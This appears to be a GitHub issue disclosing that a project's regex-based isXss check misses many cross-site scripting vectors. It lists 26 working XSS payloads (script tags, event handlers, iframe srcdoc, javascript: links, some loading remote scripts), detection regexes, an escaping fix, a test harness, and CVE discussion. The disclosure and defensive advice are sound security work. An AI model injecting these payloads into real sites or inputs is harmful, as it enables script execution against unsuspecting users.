Vulnerable to XSS attacks #16

Open
cianmce opened this issue Mar 26, 2018 · 4 comments

Comments


cianmce commented Mar 26, 2018

I found multiple XSS attack vectors that aren't caught by the isXss function:

/**
 * XSS regex reference - taken from symantec
 * http://www.symantec.com/connect/articles/detection-sql-injection-and-cross-site-scripting-attacks
 */
const xssSimple = new RegExp('((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)', 'i')
const xssImgSrc = new RegExp('((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^\n]+((%3E)|>)', 'i')
// Flags a value only if one of the two patterns above matches it
function isXss (value) {
  return xssSimple.test(value) || xssImgSrc.test(value)
}

tl;dr

Don't use regexes for sanitization of HTML, but if you do, then at least strip out all tags with something like:

const xssAnyTag = new RegExp('<(|\/|[^\/>][^>]+|\/[^>][^>]+)>')

But even with this, I'd imagine a carefully constructed XSS vector could get around it.
I'd advise:

  • Escaping the characters using HTML entities
    e.g.
// Characters that can break out of HTML text or attribute context, and their entities
var entityMap = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
  '/': '&#x2F;',
  '`': '&#x60;',
  '=': '&#x3D;'
};
// Replace every such character so the value can never open a tag or attribute
var escapeHtml = function (value) {
  return String(value).replace(/[&<>"'`=\/]/g, function (s) {
    return entityMap[s];
  });
};
  • Using a node's text attribute (this isn't an option for server-side code)
    e.g.
document.getElementById("my_id").innerText = unsafeString;

As discussed in many posts e.g.

Regular expressions are not a valid approach when dealing with a more complicated language (especially when browsers support dirty HTML).

For example, here are 26 valid XSS attack vectors that are all reported as false

Attack Vectors

<script >alert("XSS - 1");</script >
<script type="application/javascript">alert("XSS - 2");</script >
<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >
<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />
<input type="image" src onerror="alert('XSS - 5')">
<object data="a.a" onerror="alert('XSS - 6')" />
<object data="a.a" onerror="alert('XSS - 7')">
<link data="a.a" onerror="alert('XSS - 8')">
<input onfocus="console.log('XSS - 9')" autofocus> // Uses console.log as "alert" will cause an infinite loop
<video ><source onerror="alert('XSS - 10')" >
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 11')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 12')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;" />
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 13')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15">
<iframe style="display:none;" src="//a.a" onload="alert('XSS - 16');"></iframe >
<div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 17')"></div >
<p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 18')">
<frameset onload="alert('XSS - 19')"><frame onload="Limited support"></frameset >
<a href="javascript:alert('XSS - 20')" style="text-decoration: none; color:#000;" > 
<a onclick="alert('XSS - 21')" style="text-decoration: none; color:#000;" > 
<a onmouseover="alert('XSS - 22')" style="text-decoration: none; color:#000;" > 
<body onunload="alert('XSS - 23')">
<body onresize="alert('XSS - 24');">
<body onload="alert('XSS - 25')">
  <!-- XSS - 26: No JavaScript, but fully hides the page and prevents any clicks -->
<body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">

Proof Of Concept

These have been tested against the current function, the updated function that tests for any tag, escaping, and setting via the text attribute.
The results can be seen here: http://embed.plnkr.co/xHbhB29JWWyMUMeHsLrm

I'm sure there are many other edge cases I haven't thought of yet or that haven't been developed by browsers yet.

If you insist on using regex, here's a good list (plus just remove any tag):
https://github.com/PHPIDS/PHPIDS/blob/master/lib/IDS/default_filter.json
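To make the comparison described in the proof of concept reproducible offline, here is an added harness that is not part of the issue or the project's code. It runs the project's isXss regexes (copied from the issue), the issue's tag-stripping regex, and the issue's entity escaper over a hand-picked subset of the vectors above plus one benign string; the VECTORS array, the benign sample, and the evaluate/summarize names are constructed for this example.

```javascript
'use strict';

// Detector copied from the issue (the project's isXss), kept as-is so the misses reproduce.
const xssSimple = new RegExp('((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)', 'i');
const xssImgSrc = new RegExp('((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^\n]+((%3E)|>)', 'i');
function isXss(value) {
  return xssSimple.test(value) || xssImgSrc.test(value);
}

// The issue's "strip any tag" regex, made global so every tag in the string is removed.
// Note it is lossy: any "<...>" span in ordinary text is deleted too (see the benign sample).
const xssAnyTag = new RegExp('<(|/|[^/>][^>]+|/[^>][^>]+)>', 'g');
function stripTags(value) {
  return String(value).replace(xssAnyTag, '');
}

// The issue's entity escaper: output cannot contain a raw '<' or '>', so no tag can be opened.
const entityMap = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;',
  "'": '&#39;', '/': '&#x2F;', '`': '&#x60;', '=': '&#x3D;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"'`=\/]/g, (s) => entityMap[s]);
}

// Constructed subset of the issue's vectors (ids 1, 2, 5, 9, 10, 11, 20, 25).
const VECTORS = [
  `<script >alert("XSS - 1");</script >`,
  `<script type="application/javascript">alert("XSS - 2");</script >`,
  `<input type="image" src onerror="alert('XSS - 5')">`,
  `<input onfocus="console.log('XSS - 9')" autofocus>`,
  `<video ><source onerror="alert('XSS - 10')" >`,
  `<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 11')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">`,
  `<a href="javascript:alert('XSS - 20')" style="text-decoration: none; color:#000;" >`,
  `<body onload="alert('XSS - 25')">`,
];
// Constructed benign input: a comparison that happens to contain '<' and '>'.
const BENIGN = '5 < 6 && 7 > 3';

// Run every strategy over each vector and record what survived.
function evaluate(vectors) {
  return vectors.map((input) => {
    const escaped = escapeHtml(input);
    return {
      input,
      flaggedByIsXss: isXss(input),
      stripped: stripTags(input),
      escaped,
      escapedIsInert: !/[<>]/.test(escaped),
    };
  });
}

// Aggregate counts: how many vectors the blocklist misses, how many tags survive
// stripping, and how many vectors are rendered inert by escaping.
function summarize(vectors) {
  const rows = evaluate(vectors);
  return {
    total: rows.length,
    missedByIsXss: rows.filter((r) => !r.flaggedByIsXss).length,
    tagLeftAfterStrip: rows.filter((r) => /<[^>]*>/.test(r.stripped)).length,
    inertAfterEscape: rows.filter((r) => r.escapedIsInert).length,
  };
}

console.log(JSON.stringify(summarize(VECTORS), null, 2));
console.log('benign stripped:', JSON.stringify(stripTags(BENIGN)));
console.log('benign escaped :', escapeHtml(BENIGN));
```

The reason xssSimple misses every vector in the subset is visible in the pattern itself: it only matches a tag whose name is followed immediately by `>` (or `%3E`), so a single space before the closing bracket, or any attribute at all, defeats it. The benign sample shows the other side of tag stripping: it silently deletes ` < 6 && 7 >` from ordinary text, whereas escaping keeps the text readable and inert.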

@cianmce cianmce changed the title Vulnerable to XSS attacs Vulnerable to XSS attacts Mar 27, 2018
@cianmce cianmce changed the title Vulnerable to XSS attacts Vulnerable to XSS attacks Mar 27, 2018

cianmce commented Oct 28, 2018

CVE-2018-1000160 can be used to track this issue

@vdeturckheim

@cianmce I am curious. Which CNA assigned this CVE?

@attritionorg

@vdeturckheim For any CVE with a 7-digit ID, the CNA will be DWF. You can also see the assigning CNA on the CVE website as of earlier this year:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000160

Assigning CNA: Distributed Weakness Filing Project

@vdeturckheim

@attritionorg good catch thanks.
